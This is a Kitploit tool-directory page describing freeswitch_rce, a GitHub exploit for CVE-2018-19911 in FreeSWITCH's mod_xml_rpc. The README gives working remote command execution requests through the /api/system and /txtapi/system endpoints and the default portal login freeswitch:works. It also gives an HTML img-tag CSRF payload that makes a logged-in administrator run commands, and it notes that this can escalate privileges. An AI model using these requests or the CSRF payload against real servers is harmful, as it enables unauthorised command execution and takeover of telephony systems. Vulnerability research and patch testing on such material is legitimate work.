Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
freeswitch_rce — freeswitch all version remote command execute (cve-2018-19911) | Kitploit
Tools/GitHubGitHub/isafeblue/freeswitch_rce
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubisafeblue/freeswitch_rce

freeswitch_rce

freeswitch all version remote command execute (cve-2018-19911)

View Repository
527 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

version:<=1.8.2

module:mod_xml_rpc

I tested a total of three versions.(download url:http://files.freeswitch.org/)

  • 1.8.2
  • 1.5.15
  • 1.7.0

1.5.15

Install freeswitch1.5.15 Windows version(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)

Open the console and type: load mod_xml_rpc (load freeswitch portal)

Access local port 8080,

http://127.0.0.1:8080/portal/index.html

Input in console api("system calc")orapi("bg_system calc")

1

Can also request the interface directly

http://127.0.0.1:8080/txtapi/system?calc or

http://127.0.0.1:8080/api/system?calc

1

1.7.0

1

1

exp

The default account and password for freeswitch portal is freeswitch:works

You can check it yourself usingfreeswitch_rce.py

Or use csrf to attack the logged in administrator.

root@kitploit:~
<img src="http://127.0.0.1:8080/api/system?calc">

1

Because freeswitch often runs with high privileges, it can also achieve the effect of privilege escalation

Download Tool